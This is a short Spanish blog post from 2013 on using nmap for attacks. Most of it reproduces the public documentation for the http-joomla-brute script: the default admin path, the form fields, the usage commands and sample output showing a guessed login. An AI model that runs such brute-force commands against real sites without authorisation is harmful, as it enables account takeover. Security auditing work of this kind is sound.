sábado, 19 de enero de 2013

Ataques con nmap

Mucho más que un escáner de red nmap en los últimos timepos se ha convertido en una herramienta muy poderosa hasta incluso para realizar ataques.

Desde nmap se pueden lanzar escaneos de red de una manera muy severa, pero es que, además, viene cargado por defecto con multitud de script para realizar diversos ataques de tipo, fuerza bruta, sqlinjection, etc.

Un ejemplo es un ataque a Joomla buscando usuarios y password mediante fuerza bruta. Carga la siguiente configuración:

Categories: brute, intrusive

Performs brute force password auditing against Joomla web CMS installations.

This script initially reads the session cookie and parses the security token to perfom the brute force password auditing.  It uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are stored using the  credentials library.

Joomla's default uri and form names:
• Default uri:/administrator/index.php

• Default uservar: username

• Default passvar: passwd


Usage
nmap -sV --script http-joomla-brute
--script-args 'userdb=users.txt,passdb=passwds.txt,http-joomla-brute.hostname=domain.com,
http-joomla-brute.threads=3,brute.firstonly=true' <target>
nmap -sV --script http-joomla-brute <target>


Output
PORT     STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-joomla-brute:
|   Accounts
|     xdeadbee:i79eWBj07g => Login correct
|   Statistics
|_    Perfomed 499 guesses in 301 seconds, average tps: 0


http://nmap.org/nsedoc/scripts/http-joomla-brute.html